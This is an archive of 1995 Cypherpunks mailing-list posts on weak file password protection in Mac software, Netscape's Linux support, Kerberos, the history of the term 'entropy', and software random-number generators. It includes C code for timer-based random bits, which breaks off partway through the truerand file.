I mean, even if they used the most obsolete algorithm, wouldn't you have to know _something_ about cryptanalysis to crack it? Are these vendors just putting a "this file is locked with such and such a password" string at the front of the file, or what?

Interesting historical note: In my old APL days (early 80's), IBM used to lock their VSAPL workspaces with just such a scheme--a "locked bit" at some fixed position in the file. But there were enough other reasons not to use that horrible product...

--Dave.

--
Dave Mandl
dmandl at panix.com
http://wfmu.org/~davem

From adam at homeport.org Sun Sep 24 09:34:17 1995
From: adam at homeport.org (Adam Shostack)
Date: Sun, 24 Sep 95 09:34:17 PDT
Subject: Amazon.com Books -- personal notification service (fwd)
Message-ID: <199509241634.MAA18446@homeport.org>

Amazon.com books (which someone mentioned here a few days ago) has a free personal notification service for new books of interest. They also claim not to sell your preferences if you so request. They have Springer-Verlag conference proceedings, and books by Hakim Bey.

I spent a while telling them all about whose new books I'd like to hear about, and this came to me today.
Adam

----- Forwarded message from eyes at amazon.com -----

From stevenw at iglou.com Sun Sep 24 10:19:57 1995
From: stevenw at iglou.com (Steven Weller)
Date: Sun, 24 Sep 95 10:19:57 PDT
Subject: Found on usenet: ACLU -- "Big Brother and the power of the Net"
Message-ID:

The Midpeninsula Chapter of American Civil Liberties Union of Northern California presents a free program, open to the public

Speaker: Jim Warren, MicroTimes correspondent, originator of the West Coast Computer Faire, PBS Computer Chronicles and numerous other enterprises
Topic: Big Brother and the power of the Net
Time: Tuesday, October 17, 1995 at 8:00 pm
Place: Mandarin Classic Restaurant; First & Main Streets, Los Altos

There is no fee and no reservation is required for those coming just for the program, but this is the annual meeting of the Midpeninsula Chapter and is preceded by a reception and dinner that are open to the public, but for which a reservation is required (see below).

6:00 pm Reception and no-host bar
7:00 pm Dinner
8:00 pm Jim Warren speaks

-------------------------------------------------------------------------
Dinner Reservation
Please return by Friday, October 6, 1995

Dinner reservation for ____ person(s)
Check for $ _____ ($25 per person) is enclosed.
Please make check payable to ACLU Mid-peninsula.

Mail to: Iris Barrie, 4250 El Camino, D-138, Palo Alto, CA 94306
If you have questions, call: Iris Barrie at 415-856-0193

--
Les Earnest (les at cs.stanford.edu)            Phone: 415 941-3984
Computer Science Dept.; Stanford, CA 94305      Fax: 415 941-3934
-------------------------------------------------------------------------

Steven Weller       | "The Internet, of course, is more
+1 415 390 9732     | than just a place to find pictures
                    | of people having sex with dogs."
stevenw at iglou.com | -- Time Magazine, 3 July 1995

From chen at intuit.com Sun Sep 24 10:34:20 1995
From: chen at intuit.com (Mark Chen)
Date: Sun, 24 Sep 95 10:34:20 PDT
Subject: macworld crypto articles
In-Reply-To:
Message-ID: <9509241729.AA17667@doom.intuit.com>

Dave,

> At 3:49 PM 9/23/95, steven ryan wrote:
> >They searched for an applications programmer *UN*skilled at cryptography to
> >try and crack the password protection of the 8 best selling Mac programs.
> >Quicken 5.0 was cracked in 5 minutes. Adobe Acrobat in 2 hours.
>
> Yup, pretty amazing. I only skimmed the article, but I believe that out of
> all the programs he tried, there was only one whose crypto he couldn't
> crack. I found it all a little hard to believe. I mean, even if they used
> the most obsolete algorithm, wouldn't you have to know _something_ about
> cryptanalysis to crack it? Are these vendors just putting a "this file is
> locked with such and such a password" string at the front of the file,
> or what?

I hate to say it, but in the case of Quicken, this is exactly right. In version 5.0, we've taken measures to protect the online financial stuff, but there's no serious protection at all on the local data file. It's truly a deplorable state of affairs.

- Mark

--
Mark Chen
chen at intuit.com
415/329-6913
finger for PGP public key
D4 99 54 2A 98 B1 48 0C CF 95 A5 B0 6E E0 1E 1D

From lethin at ai.mit.edu Sun Sep 24 10:46:20 1995
From: lethin at ai.mit.edu (Rich Lethin)
Date: Sun, 24 Sep 95 10:46:20 PDT
Subject: macworld crypto articles
In-Reply-To: <4444rl$nrh@life.ai.mit.edu>
Message-ID: <199509241745.NAA20271@toast.ai.mit.edu>

In article <4444rl$nrh at life.ai.mit.edu> Chen writes:
> It's truly a deplorable state of affairs.

For the next version, include PGP free with every version of Quicken, and have Quicken just "call" PGP.

Of course, users can encrypt their files now with PGP. Is there an Intuit bboard where someone could post instructions?

--
---
Concurrent VLSI Arch.
Group 545 Technology Sq., Rm. 610
MIT AI Lab Cambridge, MA 02139 (617)-253-0972

From jsimmons at goblin.punk.net Sun Sep 24 10:50:36 1995
From: jsimmons at goblin.punk.net (Jeff Simmons)
Date: Sun, 24 Sep 95 10:50:36 PDT
Subject: Netscape for Linux?
In-Reply-To: <199509240436.VAA28304@ix5.ix.netcom.com>
Message-ID: <199509241746.KAA01423@goblin.punk.net>

On September 23, Bill Stewart wrote:
>
> Foo. Supporting applications in a professional way on Linux is _tough_;
>

As a Linux user and advocate, I've gotta agree here. I'm glad that Netscape is going to continue to supply us with an unsupported binary, and I can't blame them a bit for not wanting to support an OS where every user has his own private version number ... would be nice if we could get 128 bit keys, though ... (hint, hint).

As for your other comments about Linux - would you care to take off your coat and meet me in Comp.os.flamewars sometime? ;-)

--
Jeff Simmons jsimmons at goblin.punk.net

From adam at homeport.org Sun Sep 24 12:28:42 1995
From: adam at homeport.org (Adam Shostack)
Date: Sun, 24 Sep 95 12:28:42 PDT
Subject: macworld crypto articles
In-Reply-To: <199509241745.NAA20271@toast.ai.mit.edu>
Message-ID: <199509241924.PAA18525@homeport.org>

| For the next version, include PGP free with every version of Quicken,
| and have Quicken just "call" PGP.
|
| Of course, users can encrypt their files now with PGP. Is there an
| Intuit bboard where someone could post instructions?

Of course, it would be *much* easier to store Quicken + data files on an encrypted filesystem (Cryptdisk or SFS). To start Quicken, the user starts Cryptdisk, runs Quicken on his encrypted files (now transparently available), and then quits. Cryptdisk disappears 5 minutes later.

Thus, Intuit isn't putting crypto calls which might be illegal into their code. They maintain a single code base, a single version in the warehouses, and continue to lobby Congress to change the laws.
(Quicken gets stored on the encrypted area so that it won't start up and say 'where are my data files?')

Naturally, this works with programs other than Quicken.

Adam

--
"It is seldom that liberty of any kind is lost all at once." -Hume

From beckman at cs.hope.edu Sun Sep 24 12:46:03 1995
From: beckman at cs.hope.edu (Peter Beckman)
Date: Sun, 24 Sep 95 12:46:03 PDT
Subject: Kerberos
Message-ID: <9509241945.AA07710@atlantis.cs.hope.edu>

We are studying Kerberos, the security system implemented by MIT's Athena network. Has anyone started, considered, imagined or completed any similar security systems, preferably using public key cryptography (as opposed to a single 56-bit DES key)?

Please mail any responses to beckman at cs.hope.edu.

--
Peter Beckman
Hope College
beckman at cs.hope.edu
http://www.cs.hope.edu/~beckman/

From adwestro at ouray.cudenver.edu Sun Sep 24 13:09:19 1995
From: adwestro at ouray.cudenver.edu (Alan Westrope)
Date: Sun, 24 Sep 95 13:09:19 PDT
Subject: Entropy VI: "Shannon's Choice" (with apologies to Wm. Styron)
Message-ID:

I'm always glad to see stuff here about entropy: it's a topic that comes up in PGP 101 when locals ask, "How long should my passphrase be?" and, as we've seen recently, failure to generate adequate entropy for pseudo-random numbers is often the Achilles' Heel of otherwise solid cryptosystems.

I found some info about Shannon's choice of the word "entropy" in an unexpected source lately. I had some free time this week due to the surprise snowstorm here, and used it to type in a few paragraphs. This is intended less for immediate discussion than for the list's archives, so that I can point folks to it in the future. And I'm not going to cite the source, to avoid copyright infringement nastygrams...if you know who the author is, keep it to yourself: you'll only suffer public ridicule and loss of "reputation capital" for Not Watching Enough TV!!! :-)

N.B.
-- some of this impresses me as pompous bullshit, and I'm not in agreement with it. But the story about von Neumann made it a worthwhile read, at least to me.

==================================================================

I want now to turn to another juncture in the cascading bifurcations that mark interpretations of Maxwell's Demon. The juncture occurs when Leon Brillouin and Claude Shannon diverge in their opinions about what the relationship between information and entropy should be. In Brillouin's analysis of Maxwell's Demon, the Demon's information allowed him to sort molecules, thus decreasing the system's entropy; but this information had to be paid for by an even greater increase in entropy elsewhere in the system. For Brillouin, then, information and entropy are opposites and should have opposite signs. He emphasized the inverse connection between information and entropy by coining "negentropy" (from negative entropy) as a synonym for information.

To Shannon, an engineer at Bell Laboratories who published a two-part paper that was to form the basis of modern information theory (1948), information and entropy were not opposites. They were identical. When Shannon devised a probability function that he identified with information, he chose to call the quantity calculated by the function the "entropy" of the message. Why he made this choice is unclear. Rumor has it that von Neumann told Shannon to use the word because "no one knows what entropy is, so in a debate you will always have the advantage."

One could argue that von Neumann's comment was only one element and that the choice of "entropy" was overdetermined, with multiple factors leading to its conflation with "information." On a conceptual level, an important consideration was the similarity between Shannon's equation for information and Boltzmann's equation for entropy. Because the two equations had similar forms, it was tempting to regard the entities they defined as the same.
On the level of language, entropy was compelling because it was a term of recognized legitimacy to the concept of information. On a cultural level, Shannon's choice anticipated the contemporary insight that proliferating information is associated with the production of entropy.

[...]

Whatever the reasons for Shannon's choice, it is regarded by many commentators within our scientific tradition as a scandal, for it led to the (metaphoric) knotting together of concepts that are partly similar and partly dissimilar. Typical is K. G. and J. S. Denbigh's reaction in their careful study of the way the quantity defined by Shannon's equation differs from thermodynamic entropy. Recounting the story about von Neumann's advice, they write that thus, "confusion entered in and von Neumann had done science a disservice!" Jeffrey S. Wicken is even more explicit, calling Shannon's choice "loose language" that served "the dark god of obfuscation." "As a result of its independent lines of development in thermodynamics and information theory, there are in science today two 'entropies,'" Wicken writes. "This is one too many. It is not science's habit to affix the same name to different concepts. Shared names suggest shared meanings, and the connotative field of the old tends inevitably to intrude on the denotative terrain of the new."

Clearly Wicken's concern is to restore scientific univocality by closing off the ability of the information-entropy connection to act as a metaphor rather than a congruence. Yet at the same time he admits that shared language creates an inevitable "intrusion" into the "denotative terrain" of one term by the "connotative field" of another. The problem is more scandalous than he recognizes, for whenever a heuristic is proposed, it necessarily uses "shared names" that cause scientific denotation to be interpenetrated by cultural connotations. For what else is language but "shared names"? As Wittgenstein has observed, there are no private languages.
Moreover, the distinction between denotative and connotative language is itself part of the distinction between language-as-vehicle and language-as-concept which metaphors, and particularly self-reflexive metaphors, bring into question. To turn Wicken's argument on its head, we might say he recognizes that metaphors in general, and the information-entropy connection in particular, directly threaten science's ability to separate ideas from the language it uses to express them.

In his anxiety to suppress the metaphoric potential of Shannon's choice, Wicken misses the richly complex and suggestive connections that were instrumental in enabling a new view of chaos to emerge. By the simple device of using "information" and "entropy" as if they were interchangeable terms, Shannon's choice gave rise to decades of interpretative commentary that sought to explain why information should be identified with disorder rather than order. For the alliance between entropy and information to be effective, information first had to be divorced from meaning (a premise made explicit in Shannon's 1948 papers) and had to be associated instead with novelty. Recall the random number generator, mentioned earlier, that produces a tape we can read. No matter how long we watch the tape, numbers keep appearing in unpredictable sequence. From one point of view this situation represents chaos; from another, maximum information. Once randomness was understood as maximum information, it was possible to envision chaos (as Robert Shaw does) as the source of all that is new in the world.

Wicken is correct in noting that denotative and connotative fields overlap; in the case of information, the connotation that "intruded" upon the denotative field of chaos was complexity. Whereas chaos had traditionally meant simply disorder, complexity implied a mingling of symmetry with asymmetry, predictable periodicity with unpredictable variation.
As we have seen, chaotic or complex systems are disordered in the sense that they are unpredictable, but they are ordered in the sense that they possess recursive symmetries that almost, but not quite, replicate themselves over time. The metaphoric joining of entropy and information was instrumental in bringing about these developments, for it allowed complexity to be seen as rich in information rather than deficient in order.

Sources cited:

K. G. Denbigh and J. S. Denbigh, _Entropy in Relation to Incomplete Knowledge_ (Cambridge University Press, 1985)

Jeffrey S. Wicken, "Entropy and Information: Suggestions for a Common Language." Philosophy of Science 54:176-193 (1987)

==================================================================

Alan Westrope                __________/|-,
                            (_)        \|-'
2.6.2 public key: finger / servers
PGP 0xB8359639: D6 89 74 03 77 C8 2D 43 7C CA 6D 57 29 25 69 23

From aleph1 at dfw.net Sun Sep 24 11:10:14 1995
From: aleph1 at dfw.net (Aleph One)
Date: Sun, 24 Sep 1995 13:10:14 -0500 (CDT)
Subject: Netscape for Linux?
In-Reply-To: <199509241746.KAA01423@goblin.punk.net>
Message-ID:

I must agree that supporting something like that client that everyone wants to use in their own configuration is not an easy thing. But there are many ISPs using Linux as web servers. I for one would buy a few servers myself. It's a shame Netscape does not make an agreement with someone like Red Hat (a commercial Linux vendor) and supply a server for use with it. I am sure if they can support a server for BSDI (therefore FreeBSD and NetBSD) they can support one for Red Hat (and therefore Linux).

But this does not belong in cypherpunks anymore. Nor are the people making these decisions on this list anyway.

Aleph One / aleph1 at dfw.net
http://underground.org/
KeyID 1024/948FD6B5
Fingerprint EE C9 E8 AA CB AF 09 61 8C 39 EA 47 A8 6A B8 01

From khijol!erc Sun Sep 24 13:28:33 1995
From: khijol!erc (Ed Carp [khijol SysAdmin])
Date: Sun, 24 Sep 95 13:28:33 PDT
Subject: Netscape for Linux?
In-Reply-To: <3064BDFB.717F@netscape.com>
Message-ID: <199509242006.PAA02258@khijol>

-----BEGIN PGP SIGNED MESSAGE-----

> > And the sad part is that now that they have announced that they are
> > dropping their unofficial Linux support,
>
> I have no current plans to alter our treatment of Linux. It is not now,
> nor has it ever been, a supported platform. We do build for it,
> and some people are happy about that.

Does this mean that a Linux version of Netscape will no longer be available, or that it *will* be available but unsupported?

> I have not constructed a business case which would cause Netscape
> to begin support for Linux versions of the Navigator. Right now, I'm
> not sure that making a point of this would do what you want.

That all depends on what you mean by "support". If you mean "we will no longer make Netscape available for the Linux platform", that's not support. If you mean "we will no longer respond to bug reports for Netscape on this platform" then that's discontinuing support. Please be more specific in your postings?

As a project manager and developer, I have constructed many a business case for the development and/or support for products - such a case could easily be made for Linux support for Netscape, irrespective of what you mean by "support".

- --
Ed Carp, N7EKG   Ed.Carp at linux.org, ecarp at netcom.com   214/993-3935 voicemail/pager
Finger ecarp at netcom.com for PGP 2.5 public key   an88744 at anon.penet.fi

Q. What's the trouble with writing an MS-DOS program to emulate Clinton?
A. Figuring out what to do with the other 639K of memory.

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMGW6JSS9AwzY9LDxAQElggP9Gy4h5OYkfQqtE0yi4K8rng1C3G/vgr0S
EOfUdFaiw8pewcjgxe4ZqtDyxAeeRGgEYjmAQLA5739xjExCGL45O4OnYMopGDzd
Sfmi557I/qJib1utfE51wkUjqyxutTceb4UDUmUS0TOs/kMCf6DXTvNePRLxVtm4
rW1C9BfDClk=
=kj39
-----END PGP SIGNATURE-----

From bianco at itribe.net Sun Sep 24 13:32:59 1995
From: bianco at itribe.net (David J.
Bianco)
Date: Sun, 24 Sep 95 13:32:59 PDT
Subject: Kerberos
In-Reply-To: <9509241945.AA07710@atlantis.cs.hope.edu>
Message-ID: <199509242029.QAA26489@gatekeeper.itribe.net>

On Sep 24, 15:45, Peter Beckman sent the following to the NSA's mail archives:
> Subject: Kerberos
|| We are studying kerberos, the security system implemented by MIT's Athena network.
|| Has anyone started, considered, imagined or completed any similar security
|| systems, preferably using public key cryptography (as opposed to a single 56-bit
|| DES key)?
||

The Open Software Foundation's Distributed Computing Environment has the concept of a central security registry (which is currently based on Kerberos). I haven't delved too deeply into them, but the OSF website has some DCE RFCs about adding public key capabilities to the registry. They should be off the OSF home page somewhere at .

David

--
==========================================================================
David J. Bianco                 | Web Wonders, Online Oddities, Cool Stuff
iTribe, Inc.                    | Phone: (804) 446-9060 Fax: (804) 446-9061
Suite 1700, World Trade Center  | email:
Norfolk, VA 23510               | URL : http://www.itribe.net/~bianco/

From lethin at ai.mit.edu Sun Sep 24 13:45:04 1995
From: lethin at ai.mit.edu (Rich Lethin)
Date: Sun, 24 Sep 95 13:45:04 PDT
Subject: Piggybacking
Message-ID: <199509242044.QAA15210@grape-nuts.ai.mit.edu>

In article <444bp8$sd4 at life.ai.mit.edu> Adam writes:
> Naturally, this works with programs other than Quicken.

By leveraging on the popularity of Quicken and people's insecurities about their financial data cypherpunks might be able to spread PGP and SecureDrive technology more rapidly.

If I were a marketing manager at a startup selling SecureDrive, for example, I'd suggest trying to exploit the above by selling my product as "QuickxxSecure" which would install after Quicken, make the secure drive, move Quicken there, etc. It would then sell in a box with a graphical design (e.g.
white stripe on red box, to blend nicely with Intuit's red on white) that Egghead would want to put on the shelf right next to Quicken.

Cypherpunks with a crypto-anarchic agenda might "package" shareware in a way that would exploit the same principles. Surely, a bigger market than people using EMACS RMAIL.

---
Concurrent VLSI Arch. Group 545 Technology Sq., Rm. 610
MIT AI Lab Cambridge, MA 02139 (617)-253-0972

From patrick at verity.com Sun Sep 24 13:45:20 1995
From: patrick at verity.com (Patrick Horgan)
Date: Sun, 24 Sep 1995 13:45:20 -0700
Subject: Defense against a class of programming bugs
Message-ID: <9509242045.AA20998@cantina.verity.com>

From khijol!erc Sun Sep 24 13:45:22 1995
From: khijol!erc (Ed Carp [khijol SysAdmin])
Date: Sun, 24 Sep 95 13:45:22 PDT
Subject: "random" number seeds vs. Netscape
In-Reply-To: <199509232229.SAA00612@nrk.com>
Message-ID: <199509242029.PAA02731@khijol>

-----BEGIN PGP SIGNED MESSAGE-----

> As a hardware type, I'd prefer a diode noise generator over a
> radioactivity detector. I'd hate for the Fort to be tempted to fudge the
> latter's output by flooding my house from a black helicopter...

No, they'll just flood it with RF and force your diode to act as a detector - then they can feed you anything they like ;)

I learned the hard way - keep the transmitters away from a reverse-biased diode acting as a noise generator. Only until I examined the output did I realize it wasn't random. I fixed it, though, by looking at the output and testing its randomness.

- --
Ed Carp, N7EKG   Ed.Carp at linux.org, ecarp at netcom.com   214/993-3935 voicemail/pager
Finger ecarp at netcom.com for PGP 2.5 public key   an88744 at anon.penet.fi

Q. What's the trouble with writing an MS-DOS program to emulate Clinton?
A. Figuring out what to do with the other 639K of memory.
-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMGW/mSS9AwzY9LDxAQGc4gQAjwszSdrT188RrvbTnp9ywwJ99ppixEef
V9m59O169LIh4YwIejicJbO7/zC5t99gs15ZnbTWXZim8r+04XrR3AFyRnQFTDfJ
WmYmW6gHWR40xBxgVMFUydz9TsZqCxGb+iVQRTeteodgMr6x+zbJ0qa8FWy4UNLr
iYfFbjH+okg=
=Qv+f
-----END PGP SIGNATURE-----

From donner at ny.ubs.com Sun Sep 24 14:11:52 1995
From: donner at ny.ubs.com (Marc Donner)
Date: Sun, 24 Sep 95 14:11:52 PDT
Subject: change of address notice for Marc Donner
Message-ID: <9509242111.AA21917@ikura.ny.ubs.com>

Dear colleague, friend, or correspondent,

My new business address is:

Marc Donner
Union Bank of Switzerland
299 Park Avenue
New York, NY 10171
212-821-6229

You can send me email at: donner at ubss.com

The destination list for this mail is gleaned from an automated analysis of many megabytes of mail that I have accumulated over the last three years. In some cases you are receiving this not because we are acquaintances or correspondents but because you were a recipient of some piece of mail that I also received and kept. If so, I apologize for the intrusion. I have pruned the list extensively, but some email IDs are sufficiently opaque that I cannot reliably identify the person at the other end.

Marc

From perry at piermont.com Sun Sep 24 14:21:26 1995
From: perry at piermont.com (Perry E. Metzger)
Date: Sun, 24 Sep 95 14:21:26 PDT
Subject: "Going after Netscape"
In-Reply-To: <199509232003.QAA11668@book.hks.net>
Message-ID: <199509242121.RAA08234@frankenstein.piermont.com>

Lucky Green writes:
> >> So, keep on "attacking" Netscape (kudos to Ray, by the way,
> >> though I've seen Netscape bomb on certain sites, as with the
> >> Cypherpunks archive site, as several of us noted a few months
> >> ago...probably a different problem, but indicative that Netscape
> >> can be corrupted). But let's be careful not to convey any flavor
> >> of this being a vendetta.
> >
> >I agree. The goal is not to kill Netscape but to make the net
> >secure.
>
> Absolutely.
We aren't on a vendetta. We want to make the net secure for > privacy. Agreed. My main purpose in harassing Netscape is that I have to live with customers who insist on using it and I want them to be safe. If that means having to attack it enough that the press starts noticing and management starts paying attention as a result, so be it. Perry From frenchie at magus.dgsys.com Sun Sep 24 15:09:16 1995 From: frenchie at magus.dgsys.com (SysAdmin) Date: Sun, 24 Sep 95 15:09:16 PDT Subject: Netscape for Linux? In-Reply-To: <199509240243.WAA00266@hoopsnake.cjs.net> Message-ID: -----BEGIN PGP SIGNED MESSAGE----- While browsing my mail I noticed that Christopher J. Shaulis wrote: [snipped] > You have also turned down numerous other attempts by various people to buy > both quantities of navigators and server software for Linux. > > It seems to me that you folks are going out of your way to deny the > fact that the Linux market exists. I think that it's because you are > embarrassed that all these people with a $20 operating system are > throwing money at you while all the folks with $10K operating systems > aren't talking to you at all. > > While you may WANT to have all your sales be for OSF/1 machines or > solaris, but refusing to support Linux and ignoring the demand for > your products by the Linux community just because you don't think it > would sound as impressive, is actually quite childish and doesn't make > any financial sense. > > Christopher You tell 'em Christopher! I have turned on quite a few of my friends to Linux. Some are Engineers and Programmers in businesses that would love to add Netscape navigator and server. Hell, I would too. Screw 'em. If they want to be the de facto standard for *some* OS's but not all, someone else will come along and fill in the gap. Besides, they already made the point that they don't want to make money so why change the status quo. All the more reason to show the weaknesses of the product before others get sucked in. 
I'll stick to TkWWW and Lynx thank you. - -- =====================PGP Encrypted Mail Preferred======================== PGP Public Keys: 1024/BEB3ED71 & 2047/D9E1F2E9 on request. As soon as any man says of the affairs of the state " What does it matter to me? " the state may be given up for lost. J.J.Rousseau - The Social Contract GAT/E/O d++@>- H--- s: a29 C+++$ UL++++($) P+>+++ L++>++++ E W+++ N++ K- w---- O- M- V-- PS+ PE++ Y+ PGP+++ t 5+ X R* tv b++ DI++ D++ G++ e h+ r y++ [Geek Code v3.0] a.k.a [ root at magus.dgsys.com / vamagus at delphi.com] ========================================================================== -----BEGIN PGP SIGNATURE----- Version: 2.6.2 iQCVAgUBMGXXKLbmxeO+s+1xAQF7BwP9GrZe0+DULZegVjPJB7iiLagq8dnY3QLs J26v2pARiZyyLBZgpBgzenXv8I0nwAL4UnDREWnOOunC3RdM0o5+ROM34tSnhdfM 4T4xEUXHp2CSI98VAkhSqKgnWZEACSeDAcx2gT7jGneAhRPO/VCQkZfz3SquRiHO 4RumiNsnInA= =TuK+ -----END PGP SIGNATURE----- From jcaldwel at iquest.net Sun Sep 24 15:45:41 1995 From: jcaldwel at iquest.net (James Caldwell) Date: Sun, 24 Sep 95 15:45:41 PDT Subject: Lynx (or approx for Windows)? Message-ID: On 24 Sep 95 at 18:10, SysAdmin wrote: > Screw 'em. If they want to be the defacto standard for *some* OS's > but not all, someone else will come along and fill in the gap. > Besides, they already made the point that they don't want to make > money so why change the status quo. All the more reason to show the > weaknesses of the product before others get sucked in. I'll stick to > TkWWW and Lynx thank you. Sounds odd, but would there be something like Lynx available for Windows, preferably with forms features fixed. I don't browse for the pretty pictures and turning the graphics off in Nutscrape doesn't speed it up much. From rfb at lehman.com Sun Sep 24 15:53:56 1995 From: rfb at lehman.com (Rick Busdiecker) Date: Sun, 24 Sep 95 15:53:56 PDT Subject: `Random' seed. 
In-Reply-To: <9509200915.ZM14792@glacius.alias.com> Message-ID: <9509242252.AA03400@cfdevx1.lehman.com> -----BEGIN PGP SIGNED MESSAGE----- From: Richard Martin Date: Wed, 20 Sep 1995 09:15:49 -0400 Vaporware which I heard around CFP '95, and have been sort of wondering about ever since... Some one told me that some one else [possibly Matt Blaze] had been looking at how much randomness could be got by forking two child processes which would just run as asynchronous clocks: whenever the parent program needs a little `random' bit, it queries both and gives (clock(A) + clock(B) % 2) or something. I've played around with something that Matt posted here a while back which seems to use the same idea. Matt suggested that this appears to emit one random bit per second. I've done some very lightweight analysis and haven't seen anything to suggest that the output is not random, but I wouldn't make any bets based on what I've done. FWIW, I discussed this code briefly with an engineer at Netscape a while back . . . . Rick - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - /* -*- Mode: C -*- */ /********************************************************************* This is from a message on the Cypherpunks mailing list: Posted-Date: Fri, 20 Jan 95 03:36:17 -0500 Message-Id: <9501200836.AA19977 at merckx.info.att.com> To: cypherpunks at toad.com Subject: Re: Threats in real life - what are we worried about? 
Date: Fri, 20 Jan 95 03:36:17 -0500 From: Matt Blaze *********************************************************************/

/* Header names were lost when the message was archived; they are restored
 * here from the calls the code makes.  count is volatile so the busy loop
 * in main() is not optimised away and the handler sees the live value. */
#include <stdio.h>
#include <signal.h>
#include <unistd.h>	/* alarm() */

volatile int count = 0;

/* SIGALRM handler: once a second, emit the low bit of the free-running
 * counter, then re-arm the alarm. */
void printbit(int sig)
{
	signal(SIGALRM, printbit);
	alarm(1);
	printf("%1d", count & 01);
	fflush(stdout);
}

int main(void)
{
	signal(SIGALRM, printbit);
	alarm(1);
	while (1)
		count++;
}

-----BEGIN PGP SIGNATURE----- Version: 2.6.2 iQCVAwUBMGXhPZNR+/jb2ZlNAQEkdgQAlVBgpN8LLeb9TM0dhy1Bx7KXfHCiIqV6 UoLRm/hoEzsiOnGbJeNlx2n1dyxdmti/Zvacnsi2CAKHhJGAaARcQGy+hWc6uS3v nbOqOoFkvRlWYyYV6QLgvKckYM+tbYBvrjQgQ/XivpoPQPbzyRI6cW4soLuJ7fpu xug5C8yYc8A= =dT9a -----END PGP SIGNATURE----- From rrothenb at ic.sunysb.edu Sun Sep 24 16:28:14 1995 From: rrothenb at ic.sunysb.edu (Deranged Mutant) Date: Sun, 24 Sep 95 16:28:14 PDT Subject: Snake Oil (was: macworld crypto article) In-Reply-To: Message-ID: <199509242327.TAA06477@libws4.ic.sunysb.edu> Dave Mandl wrote about some lame Mac crypto thing... [..] > Yup, pretty amazing. I only skimmed the article, but I believe that out of > all the programs he tried, there was only one whose crypto he couldn't > crack. I found it all a little hard to believe. I mean, even if they used > the most obsolete algorithm, wouldn't you have to know _something_ about > cryptanalysis to crack it? Are these vendors just putting a "this file is > locked with this such and such a password" string at the front of the file, > or what? [..] Sounds like it's time for a Snake-Oil FAQ... Rob From bret at bjohns.win.net Sun Sep 24 16:32:56 1995 From: bret at bjohns.win.net (Bret A. Johnson) Date: Sun, 24 Sep 95 16:32:56 PDT Subject: Netscape for Linux? Message-ID: <1895@bjohns.win.net> >> > And the sad part is that now that they have announced that they are >> > dropping their unofficial Linux support, >> >> I have no current plans to alter our treatment of Linux. It is not now, >> nor has it ever been, a supported platform. We do build for it, >> and some people are happy about that. 
>> >> I have not constructed a business case which would cause Netscape >> to begin support for Linux versions of the Navigator. Right now, I'm >> not sure that making a point of this would do what you want. > >I'll say some people are happy about it. > >You just recently turned down an order for 230 copies of the netscape >navigator for Linux, and as you folks aren't making any money, you can >only wonder why. > >You have also turned down numerous other attempts by various people to buy >both quantities of navigators and server software for Linux. > >It seems to me that you folks are going out of your way to deny the >fact that the Linux market exists. I think that it's because you are >embarrassed that all these people with a $20 operating system are >throwing money at you while all the folks with $10K operating systems >aren't talking to you at all. That is ok! I just called their "Sales" dept. and asked for some info. to be sent to me on their servers. I got 5 copies of what is on the WEB page. I could have done that. I asked him for prices and told him this was to present to a group of Marketing and Buss. type for a community system to bring Internet access to a whole county that does not have it now.. BTW, the system will be running on Suns and SGI's..... Oh well.. I thought they would do better than this. So far, they're no better than Sun at customer service... From sryan at reading.com Sun Sep 24 16:59:54 1995 From: sryan at reading.com (steven ryan) Date: Sun, 24 Sep 95 16:59:54 PDT Subject: Crypto in Wired Message-ID: <199509250000.UAA10758@zork.tiac.net> Good issue of Wired this month (10/95) Vic Sussman has a half page on PGPfone. Asked why he's giving away PGPfone with an indictment hanging over his head Zimmermann says "... I am a cryptographer. This is what I do". Banking with First Virtual by Andrew Leonard Anonymous Speech by Tom Bell Data Dicks by John Whalen Did you know you can recover data on magnetic media that's been written over up to nine times? 
These guys do - for a living. Wanna Bet by Evan I Schwartz Guess what's going to be the next killer app on the net. Steven Steven Ryan sryan at reading.com From mab at crypto.com Sun Sep 24 17:05:32 1995 From: mab at crypto.com (Matt Blaze) Date: Sun, 24 Sep 95 17:05:32 PDT Subject: `Random' seed. Message-ID: <199509250016.UAA19204@crypto.com> > I've played around with something that Matt posted here a while back > which seems to use the same idea. Matt suggested that this appears to > emit one random bit per second. I've done some very lightweight > analysis and haven't seen anything to suggest that the output is not > random, but I wouldn't make any bets based on what I've done. Here's my current favorite quick-and-dirty true-random-in-software generator. Use at own risk and read the comments carefully... -matt ===================cut here=========================== /* * Physically random numbers (very nearly uniform) * D. P. Mitchell * Modified by Matt Blaze 2/95 */ /* * The authors of this software are Don Mitchell and Matt Blaze. * Copyright (c) 1995 by AT&T. * Permission to use, copy, and modify this software without fee * is hereby granted, provided that this entire notice is included in * all copies of any software which is or includes a copy or * modification of this software and in all copies of the supporting * documentation for such software. * * This software may be subject to United States export controls. * * THIS SOFTWARE IS BEING PROVIDED "AS IS", WITHOUT ANY EXPRESS OR IMPLIED * WARRANTY. IN PARTICULAR, NEITHER THE AUTHORS NOR AT&T MAKE ANY * REPRESENTATION OR WARRANTY OF ANY KIND CONCERNING THE MERCHANTABILITY * OF THIS SOFTWARE OR ITS FITNESS FOR ANY PARTICULAR PURPOSE. */ /* * WARNING: depending on the particular platform, truerand() output may * be biased or correlated. In general, you can expect about 16 bits of * "pseudo-entropy" out of each 32 bit word returned by truerand(), * but it may not be uniformly diffused. 
You should therefore run
 * the output through some post-whitening function (like MD5 or DES or
 * whatever) before using it to generate key material. (RSAREF's
 * random package does this for you when you feed truerand() bits to the
 * seed input function.)
 *
 * Test these assumptions on your own platform before fielding a system
 * based on this software or these techniques.
 *
 * This software seems to work well (at 16 bits per truerand() call) on
 * a Sun Sparc-20 under SunOS 4.1.3 and on a P100 under BSDI 2.0. You're
 * on your own elsewhere.
 */

/* The header names were lost when the message was archived; they are
 * restored here from the calls used (perror, signal, setjmp/longjmp,
 * setitimer/timerclear).  count is volatile because it is bumped in a
 * busy loop and read from a signal handler. */
#include <stdio.h>
#include <signal.h>
#include <setjmp.h>
#include <sys/time.h>

static jmp_buf env;
static volatile unsigned count;
static unsigned ocount;
static unsigned buffer;

/* Arm a one-shot real-time timer of about 16.7 ms. */
static void tick(void)
{
	struct itimerval it, oit;

	timerclear(&it.it_interval);
	it.it_value.tv_sec = 0;
	it.it_value.tv_usec = 16665;
	if (setitimer(ITIMER_REAL, &it, &oit) < 0)
		perror("tick");
}

